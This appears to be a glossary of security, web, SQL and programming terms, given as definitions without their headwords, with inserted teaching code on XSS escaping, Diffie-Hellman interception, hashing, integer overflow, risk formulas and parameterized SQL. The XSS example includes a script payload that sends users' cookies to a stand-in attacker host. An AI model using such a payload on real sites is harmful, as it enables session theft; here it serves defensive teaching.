A piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability to cause unintended or unanticipated behavior on computer software, hardware, etc.
A method attackers use to find open or vulnerable ports
Cross-site scripting (XSS) is a security bug that can affect websites. If present in your website, this bug can allow an attacker to add their own malicious JavaScript code onto the HTML pages displayed to your users. Once executed by the victim's browser, this code could then perform actions such as completely changing the behavior or appearance of the website, stealing private data, or performing actions on behalf of the user.
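As an added example (not code from the original page), the vulnerable pattern described above beside its fixed form: untrusted input interpolated straight into HTML versus the same input escaped first. The page template, the `?name=` parameter and the payload are constructed for illustration.

```python
"""Reflected XSS: vulnerable HTML construction beside the escaped version.

Added example, not from the original page. The page template and the
attacker payload below are constructed for illustration.
"""
import html

# Constructed attacker-supplied value, e.g. the value of a `?name=` query parameter.
PAYLOAD = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'


def render_vulnerable(name: str) -> str:
    """Interpolates untrusted input straight into HTML. The browser parses the
    payload as markup and runs the script in the victim's session."""
    return f"<h1>Hello, {name}!</h1>"


def render_escaped(name: str) -> str:
    """html.escape turns <, >, &, " and ' into entities, so the browser
    renders the payload as visible text instead of executing it."""
    return f"<h1>Hello, {html.escape(name, quote=True)}!</h1>"


def render_attribute_escaped(name: str) -> str:
    """Attribute context: the value must be quoted AND escaped. quote=True is
    what stops a payload like `" onfocus="alert(1)` from closing the quoted
    value and injecting a new event-handler attribute."""
    return f'<input type="text" value="{html.escape(name, quote=True)}">'


def contains_live_script(page: str) -> bool:
    """Crude check: does the rendered page still contain an unescaped <script tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_escaped(PAYLOAD))
    print(render_attribute_escaped('" onfocus="alert(1)'))
```

Escaping is context-dependent: `html.escape` is correct for element text and quoted attribute values, but JavaScript, URL and CSS contexts each need their own encoding, which is why templating engines that auto-escape per context are preferred over hand-built strings.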
The same key is used to encrypt and decrypt (e.g., Caesar, Vigenère).
One key encrypts, a different key decrypts.
Public key encryption is a type of asymmetric key encryption. There’s one key that encrypts the information and there is a different key that decrypts the information.
Finds the remainder after dividing one number by another (also called modulo or modulus). Example: 14 ÷ 4 = 3 remainder 2, so 14 mod 4 = 2, written 14 % 4 = 2 in most programming languages.
A method in cryptography by which keys (public or private) are exchanged between two parties.
One of the first asymmetric-key schemes; it is used to securely agree on a shared key over an untrusted channel rather than to encrypt messages directly.
Occurs when someone secretly intercepts communications between two parties by impersonating one or both parties.
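As an added example (not code from the original page), the key exchange described in the entries above carried through with both parties' messages, then repeated with an attacker in the middle. It uses modular exponentiation, which is where the mod operation from the earlier entry shows up in practice. The parameters `P = 23` and `G = 5` are constructed toy values chosen so the arithmetic is readable; real deployments use 2048-bit or larger groups or elliptic curves, and nothing here is secure.

```python
"""Toy Diffie-Hellman key exchange and a man-in-the-middle attack on it.

Added example, not from the original page. P and G are tiny constructed
parameters so the numbers are readable; real deployments use 2048-bit or
larger groups (or elliptic curves). Nothing here is secure.
"""
import secrets

# Constructed, insecure public parameters: a small prime p and a generator g.
P = 23
G = 5


def public_value(private: int, p: int = P, g: int = G) -> int:
    """Public value g^private mod p. In a real-size group the modulo makes
    recovering `private` from this value infeasible (discrete logarithm)."""
    return pow(g, private, p)


def shared_secret(their_public: int, my_private: int, p: int = P) -> int:
    """Each side raises the other's public value to its own private exponent."""
    return pow(their_public, my_private, p)


def honest_exchange(a_private: int, b_private: int) -> tuple[int, int]:
    """Alice and Bob exchange public values over an open channel and both
    arrive at g^(ab) mod p."""
    a_pub = public_value(a_private)            # Alice -> Bob:   A = g^a mod p
    b_pub = public_value(b_private)            # Bob   -> Alice: B = g^b mod p
    k_alice = shared_secret(b_pub, a_private)  # Alice computes B^a
    k_bob = shared_secret(a_pub, b_private)    # Bob computes   A^b
    return k_alice, k_bob                      # equal


def mitm_exchange(a_private: int, b_private: int, m_private: int) -> tuple[int, int, int, int]:
    """Mallory intercepts A and B and forwards her own public value M to each
    side. Unauthenticated DH cannot detect this: each victim now shares a key
    with Mallory, who decrypts, reads and re-encrypts everything."""
    a_pub = public_value(a_private)   # Alice sends A; Mallory captures it
    b_pub = public_value(b_private)   # Bob sends B;   Mallory captures it
    m_pub = public_value(m_private)   # Mallory sends M to both in place of A and B
    k_alice = shared_secret(m_pub, a_private)       # Alice: M^a (thinks it is with Bob)
    k_bob = shared_secret(m_pub, b_private)         # Bob:   M^b (thinks it is with Alice)
    k_mallory_alice = shared_secret(a_pub, m_private)  # Mallory: A^m == M^a
    k_mallory_bob = shared_secret(b_pub, m_private)    # Mallory: B^m == M^b
    return k_alice, k_bob, k_mallory_alice, k_mallory_bob


if __name__ == "__main__":
    a, b, m = (secrets.randbelow(P - 2) + 1 for _ in range(3))
    print("honest exchange (Alice, Bob):", honest_exchange(a, b))
    print("with MITM (Alice, Bob, Mallory<->Alice, Mallory<->Bob):", mitm_exchange(a, b, m))
```

The defence against the second scenario is authentication of the public values, for example by signing them (as TLS does with certificates), which is why the entries that follow cover signatures and certificates.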
The first widely used asymmetric algorithm used for both signing and encryption.
The output from any input that has been processed through a hashing algorithm / function.
Hashing transforms a message into a fixed-length string for the purpose of verifying the message's contents, not hiding the message. It must be easy to compute the output (the digest) for any input, but infeasible to recover an input from a given output. A hash function takes an input of arbitrary length and produces a fixed-size, short output called a digest. The digest is always the same length no matter how big the input is, and the same input always produces the same digest. Unlike symmetric and asymmetric algorithms, hash functions use no keys.
When two different inputs produce the same hash output. Because the output is fixed-size and inputs are unlimited, collisions always exist; a good hash function makes them infeasible to find.
When you can work backwards from the output to the input (as with a Caesar cipher). Hash functions are designed to be one-way, so this should not be possible.
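As an added example (not code from the original page) covering the three hashing entries above: SHA-256 digests shown to be fixed-length and deterministic, a Caesar cipher as the reversible contrast, and a collision found by brute force in a constructed 16-bit truncation of SHA-256. The truncated hash is a toy to make collisions reachable in a few hundred tries; SHA-256 itself has no known collisions.

```python
"""Hash-function properties, a collision in a toy hash, and a reversible
cipher for contrast.

Added example, not from the original page. `truncated_hash` is a constructed
16-bit toy so a collision can be found quickly; it says nothing about the
strength of full SHA-256.
"""
import hashlib


def digest_hex(data: bytes) -> str:
    """SHA-256 digest: always 32 bytes (64 hex chars), whatever the input length."""
    return hashlib.sha256(data).hexdigest()


def caesar(text: str, shift: int) -> str:
    """Caesar cipher: reversible, since caesar(caesar(t, k), -k) == t.
    The shift is the key; a hash has no such key and no inverse."""
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def truncated_hash(data: bytes, nbits: int = 16) -> int:
    """Top nbits of SHA-256 as an int: a toy hash with only 2**nbits outputs."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big") >> (256 - nbits)


def find_collision(nbits: int = 16) -> tuple[bytes, bytes]:
    """Birthday search: with 2**nbits possible outputs a collision is expected
    after roughly 2**(nbits/2) inputs (about 256 here). Returns two distinct
    inputs with the same truncated hash."""
    seen: dict[int, bytes] = {}
    i = 0
    while True:
        msg = f"msg-{i}".encode()
        h = truncated_hash(msg, nbits)
        if h in seen:
            return seen[h], msg
        seen[h] = msg
        i += 1


if __name__ == "__main__":
    print(digest_hex(b""), digest_hex(b"a" * 10_000))  # same length
    print(caesar("Attack at dawn", 3), caesar(caesar("Attack at dawn", 3), -3))
    x, y = find_collision()
    print("collision:", x, y, hex(truncated_hash(x)))
```

The birthday bound is the practical reason digest length matters: halving the number of output bits roughly quarters the work needed to find a collision, which is why truncated or legacy 128-bit hashes are retired for signatures.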
A small data file that digitally binds a public cryptographic key to an identity (a domain name or an organization), signed by a Certificate Authority.
Will secure one domain or subdomain.
Will secure one domain and an unlimited number of its subdomains.
Will secure multiple domains.
The self-signed certificate at the top of the chain; it belongs to the Certificate Authority and is pre-installed in browsers and operating systems as a trust anchor.
Acts as a “middle-man” between the root certificate and the server certificate.
Issued to the domain.
Allows a server to prove its certificate has not been revoked by sending, along with the certificate during the TLS handshake, a time-stamped OCSP response signed by the certificate authority, so the client does not have to contact the CA itself.
The process of associating a host with their expected certificate or public key.
The process of identifying, assessing and prioritizing potential risks for an organization or company.
Designed and used to assess computers, networks or applications for known weaknesses.
The practice of gathering, collecting, and logging some or all packets that pass through a computer network.
A situation in which two or more operations run concurrently on shared state and the result depends on which one finishes first; when the intended ordering is not enforced, an attacker can win the race to bypass a check (time-of-check/time-of-use).
A situation in which more data is written into a fixed-size buffer than it can hold, overwriting adjacent memory; the result ranges from data corruption and crashes to arbitrary code execution.
When an arithmetic result exceeds the maximum (or falls below the minimum) a fixed-width integer can hold and wraps around, producing a wrong value that leads to logic errors, such as allocating a buffer that is too small.
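As an added example (not code from the original page), the way the two entries above combine in practice: a size calculation that wraps around a 32-bit integer, the undersized buffer that results, and the overflow check that prevents it. Python integers do not overflow, so 32-bit wrap-around is emulated with a mask; the function names, `count`/`elem_size` parameters and record data are constructed for illustration.

```python
"""Integer overflow producing an undersized buffer, and the hardened check.

Added example, not from the original page. Python ints never overflow, so
C-style unsigned 32-bit wrap-around is emulated with a mask. Names, sizes
and the record data are constructed for illustration.
"""
UINT32_MAX = 0xFFFFFFFF


def u32(n: int) -> int:
    """Emulate unsigned 32-bit wrap-around, what C `uint32_t` arithmetic does."""
    return n & UINT32_MAX


def vulnerable_alloc_size(count: int, elem_size: int) -> int:
    """Total bytes, computed the way a naive C program would: count * elem_size.
    A large attacker-controlled count wraps past UINT32_MAX and comes out tiny."""
    return u32(count * elem_size)


def safe_alloc_size(count: int, elem_size: int) -> int:
    """Checks that the product fits in 32 bits before multiplying; raises
    instead of silently wrapping."""
    if count < 0 or elem_size < 0:
        raise ValueError("negative size")
    if elem_size and count > UINT32_MAX // elem_size:
        raise OverflowError("count * elem_size exceeds 32 bits")
    return count * elem_size


def copy_records(count: int, elem_size: int, records: bytes, size_fn) -> bytearray:
    """Allocate size_fn(count, elem_size) bytes and copy the records in.
    With vulnerable_alloc_size the buffer is too small and the copy runs past
    its end: in C that is the buffer overflow from the entry above; here the
    out-of-bounds write surfaces as an IndexError instead of memory corruption."""
    buf = bytearray(size_fn(count, elem_size))
    for i, b in enumerate(records):
        buf[i] = b  # write past the end == heap/stack corruption in C
    return buf


if __name__ == "__main__":
    # Constructed input: 0x40000001 elements of 4 bytes each.
    # 0x40000001 * 4 = 0x1_0000_0004, which wraps to 4 in 32 bits.
    print(hex(vulnerable_alloc_size(0x40000001, 4)))
    try:
        safe_alloc_size(0x40000001, 4)
    except OverflowError as e:
        print("rejected:", e)
```

The check `count > UINT32_MAX // elem_size` is the standard form: it is done with division rather than by multiplying and comparing, because the multiplication itself is what wraps.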
When a company hires a white hat hacker to assess the security of a system by finding and exploiting vulnerabilities.
Collecting information about a target without directly accessing the system (social media, news, website, etc).
Collecting information about a target by actively engaging a system and analyzing responses (network and port scans).
When the tester is first able to gain access into the target system.
Using a compromised trusted system to gain access to a target system within the same network.
Using tools to gain higher levels of privilege.
When the tester has no knowledge of the target system (simulates an external attack).
When the tester has intimate knowledge of the target system (simulates an internal attack).
When the tester has limited knowledge of the target system (for example, credentials or architecture documents but no source code).
Risk assessment that gives a numerical (typically monetary) value to the impact of a threat occurring.
How much money could be lost from a single occurrence of a threat event, determined by the formula: AV * EF = SLE
How much an asset is worth.
The fraction of the asset's value that would be lost (amount of downtime, % of data, etc.) in one threat event, expressed as a percentage or a value between 0 and 1.
How much can be expected to be lost per year from a given threat, determined by the formula: SLE * ARO = ALE
How often a threat event is expected to occur per year (typically determined from historical data); an event expected once every ten years has an ARO of 0.1.
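As an added example (not code from the original page), the two formulas above carried through on constructed figures, plus one step the page does not take: using the change in ALE to judge whether a control is worth its cost. The asset values, exposure factors, rates and the `Threat` type are assumptions for illustration.

```python
"""Quantitative risk assessment: SLE, ALE, and the annual value of a control.

Added example, not from the original page. The asset values, exposure
factors and annualized rates below are constructed; the cost-benefit step
goes one step beyond the page's two formulas.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Threat:
    name: str
    asset_value: float      # AV: what the asset is worth, in currency units
    exposure_factor: float  # EF: fraction of the asset lost per event, 0..1
    aro: float              # ARO: expected occurrences per year


def sle(av: float, ef: float) -> float:
    """Single Loss Expectancy: AV * EF = SLE."""
    if not 0.0 <= ef <= 1.0:
        raise ValueError("exposure factor must be a fraction between 0 and 1")
    return av * ef


def ale(av: float, ef: float, aro: float) -> float:
    """Annualized Loss Expectancy: SLE * ARO = ALE."""
    if aro < 0:
        raise ValueError("ARO cannot be negative")
    return sle(av, ef) * aro


def control_benefit(t: Threat, new_aro: float, new_ef: float, annual_cost: float) -> float:
    """Net annual value of a mitigation that lowers ARO and/or EF:
    (ALE before) - (ALE after) - (annual cost of the control).
    Positive means the control saves more than it costs."""
    before = ale(t.asset_value, t.exposure_factor, t.aro)
    after = ale(t.asset_value, new_ef, new_aro)
    return before - after - annual_cost


if __name__ == "__main__":
    # Constructed scenario: a 100,000 asset, 25% lost per incident, one incident every two years.
    t = Threat("ransomware on file server", asset_value=100_000, exposure_factor=0.25, aro=0.5)
    print("SLE:", sle(t.asset_value, t.exposure_factor))
    print("ALE:", ale(t.asset_value, t.exposure_factor, t.aro))
    # Offline backups do not stop the incident (ARO unchanged) but cut what is lost (EF).
    print("backup control net benefit:", control_benefit(t, new_aro=0.5, new_ef=0.05, annual_cost=3_000))
```

A control that reduces ALE by less than it costs is a candidate for risk acceptance or transference (insurance) rather than mitigation, which is how these numbers feed the risk-response choices listed further down.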
Risk assessment that defines an event’s level of risk in words rather than numbers which is determined by the potential level of impact and the likelihood of occurrence.
Risk response that removes the risk by avoiding the behavior completely.
Risk response that shares the responsibility of the risk with someone else.
Risk response that accepts the risk as is.
Risk response that puts controls in place to reduce the likelihood or the impact of the risk.
A model designed to demonstrate the most basic functionality or basic design of a product, sometimes used as a proof of concept
A particular sequence of actions that a user takes to accomplish a particular task
A can-do attitude in which a person views challenges and setbacks as ways to learn rather than terminal obstacles in their path to their goal
Indentation is the visual structure of how your code is laid out. It uses tabs or spaces to organize code into a hierarchy.
A set of data that describes and gives information about other data.
The connection between one HTML page to another HTML page
Allows adding an image to a web page. It is self-closing. The attributes of an `<img>` tag include `src`, which specifies where to get the image from (the URL of the image), and `width` and `height`, which specify the size of the image in pixels.
Way to organize information with a simple structure that is easy to read and write on a webpage. There are ordered and unordered HTML lists.
Defines an unordered list in HTML.
Defines a list item inside an HTML list.
Tables display information in a grid.
Allows adding several different types of styles to HTML elements.
Cascading Style Sheets. The language for designing web pages and adding style.
Defines which HTML elements a CSS rule applies to.
`class` is an attribute we can add to HTML tags in order to style a specific group of elements.
`id` is an attribute we can add to an HTML tag to style that specific element.
Stands for Uniform Resource Locator. You are locating a resource that exists somewhere on the internet.
Distributed Denial of Service attack. Many machines (often a botnet of compromised devices) flood a server or network with so many requests that it runs out of bandwidth, connections, or processing capacity and can no longer serve legitimate users.
A flaw or weakness in a system or device.
A cyber threat is the potential harm that could be caused by someone taking advantage of a vulnerability.
Secure version of the web transfer protocol (HTTP over TLS); encrypts data in transit between the browser and the server and authenticates the server via its certificate.
Remote Authentication Dial-In User Service (RADIUS) is a client / server protocol and software that enables remote access servers to communicate with a central server to authenticate users and authorize their access to the requested system or service.
A network security device that monitors and filters incoming and outgoing network traffic.
(MFA) An extra layer of authentication that requires two or more factors for authentication. Typically, these factors fall into three categories: something you know (password), something you have (such as a phone), or something you are (such as your fingerprint).
Creates a private network connection over a public network
Cryptographic protocols for secure communication
A suite of protocols used to secure internet protocol communications
A secure method for remote login from one computer to another
A protocol for verifying user identities across multiple systems
Wireless security protocols for protecting Wi-Fi connections
A type of internet connection that uses a phone line to connect to the web
Digital Subscriber Line, a faster phone-based connection than dial-up
A high-speed internet connection that uses light to transmit data through thin glass or plastic fibers
Fifth-generation wireless network technology offering high-speed internet access on mobile devices
The maximum rate of data transfer across a network connection
The delay before a transfer of data begins following an instruction
A centralized system that manages users, devices, and permissions across a network.
Translates human-readable domain names into IP addresses.
Automatically assigns IP addresses to devices on a network.
Allows users on the network to access and modify shared documents or resources.
Software that manages computer hardware and software resources and provides services for computer programs.
Malicious software designed to damage, disrupt, or gain unauthorized access to systems.
A SQL condition that filters results from a `SELECT` query
Symbols used in conditions (`=`, `!=`, `>`, `<`, `>=`, `<=`)
A logical expression that restricts what data is returned
To narrow down a set of results based on rules
A logical operator that requires multiple conditions to be true
A SQL operator used to filter results within a range (inclusive)
A SQL operator used for pattern matching in text data
A SQL operator that checks if a value matches any value in a given list
A condition that uses multiple filters together
A SQL clause that sorts the returned query results by one or more columns
Ascending order; the default sort direction
Descending order; used to reverse the default sorting
A SQL operation that combines rows from two or more tables based on a related column.
A join where each row in one table is paired with every row in another.
A field in one table that refers to the primary key in another table.
A temporary name assigned to a column or table using the `AS` keyword in SQL
A SQL keyword used to rename fields or tables in the query result
An organized collection of data stored electronically and accessed using a database management system (DBMS)
Structured Query Language, used to retrieve and manipulate data in a database
Information that can be used to identify, contact, or locate a single person
A request for data or information from a database
A collection of related data entries organized in rows and columns
A single record in a table
A category of data stored in a table
SQL command used to add new records to a table
SQL command used to retrieve data from a table
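As an added example (not code from the original page) covering the SQL entries above: the clauses and operators listed (`WHERE`, comparison operators, `AND`, `BETWEEN`, `LIKE`, `IN`, `ORDER BY` with `ASC`/`DESC`, `JOIN` on a foreign key, `AS` aliases, `INSERT`, `SELECT`) run against an in-memory SQLite database. The schema and rows are constructed; `GROUP BY`/`COUNT` go slightly beyond the entries. Values are passed as `?` parameters rather than formatted into the query string, which is the idiomatic way to keep user input from being interpreted as SQL.

```python
"""SQL filtering, sorting, joins and aliases against an in-memory SQLite DB.

Added example, not from the original page. The schema and rows are
constructed. Every user-supplied value is bound with a `?` placeholder; the
only string interpolation builds a list of placeholders, never values.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Create two related tables and INSERT constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("PRAGMA foreign_keys = ON")
    conn.executescript("""
        CREATE TABLE users (
            id    INTEGER PRIMARY KEY,   -- primary key
            name  TEXT NOT NULL,
            email TEXT NOT NULL          -- PII: restrict who can SELECT this
        );
        CREATE TABLE logins (
            id      INTEGER PRIMARY KEY,
            user_id INTEGER NOT NULL REFERENCES users(id),  -- foreign key
            ip      TEXT NOT NULL,
            failed  INTEGER NOT NULL,    -- 1 = failed attempt, 0 = success
            ts      TEXT NOT NULL        -- ISO-8601 timestamp, sorts lexically
        );
    """)
    conn.executemany("INSERT INTO users (id, name, email) VALUES (?, ?, ?)", [
        (1, "alice", "alice@example.com"),
        (2, "bob", "bob@example.com"),
        (3, "mallory", "mallory@example.net"),
    ])
    conn.executemany("INSERT INTO logins (user_id, ip, failed, ts) VALUES (?, ?, ?, ?)", [
        (1, "10.0.0.5", 0, "2024-01-01T08:00:00"),
        (2, "10.0.0.9", 1, "2024-01-01T08:05:00"),
        (3, "203.0.113.7", 1, "2024-01-01T08:06:00"),
        (3, "203.0.113.7", 1, "2024-01-01T08:07:00"),
        (3, "203.0.113.7", 0, "2024-01-01T08:08:00"),
        (2, "10.0.0.9", 1, "2024-01-02T09:00:00"),
    ])
    conn.commit()
    return conn


def failed_logins_by_user(conn: sqlite3.Connection, start: str, end: str) -> list[tuple[str, int]]:
    """JOIN on the foreign key, WHERE with =, AND and an inclusive BETWEEN,
    aliases via AS, and ORDER BY ... DESC with an ASC tie-breaker."""
    return conn.execute("""
        SELECT u.name AS user, COUNT(*) AS failures
        FROM logins AS l
        JOIN users AS u ON u.id = l.user_id
        WHERE l.failed = 1
          AND l.ts BETWEEN ? AND ?
        GROUP BY u.name
        ORDER BY failures DESC, user ASC
    """, (start, end)).fetchall()


def users_matching(conn: sqlite3.Connection, email_pattern: str, names: list[str]) -> list[str]:
    """LIKE pattern match combined with an IN list; ORDER BY defaults to ASC.
    Only the number of `?` placeholders is interpolated, never the values."""
    placeholders = ",".join("?" * len(names))
    rows = conn.execute(
        f"SELECT name FROM users WHERE email LIKE ? AND name IN ({placeholders}) ORDER BY name",
        (email_pattern, *names),
    ).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = build_db()
    print(failed_logins_by_user(db, "2024-01-01T00:00:00", "2024-01-01T23:59:59"))
    print(users_matching(db, "%@example.com", ["alice", "bob", "mallory"]))
```

`BETWEEN` is inclusive at both ends, so the end bound is written as the last second of the day rather than midnight of the next day, which would otherwise pull in the first event of 2 January.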
A float, or floating point value, is a numeric value that can have decimal level precision (ex: 3.14)
The way humans communicate with each other, like English, Spanish, or Mandarin.
A set of instructions (commands) and rules used to communicate with computers. Examples include Python, JavaScript, and HTML.
A way to classify the kind of information you can use in programming, like numbers, words, or true/false values.
Translates and executes program code line by line into machine code.
Translates, or "compiles", the entire program into machine code ahead of time; the resulting executable is then run immediately or saved to run later.
A programming language is any set of rules that converts strings, or graphical program elements in the case of visual programming languages, to various kinds of machine code output.
a computer programming language consisting of binary instructions
A language where variable types are determined at runtime, not in advance.
The process of verifying and enforcing the constraints of types in a programming language.
The period when a program is running, after it has been compiled or interpreted.
A language where variable types are explicitly declared and checked at compile time.
Processes commands to a computer program in the form of lines of text.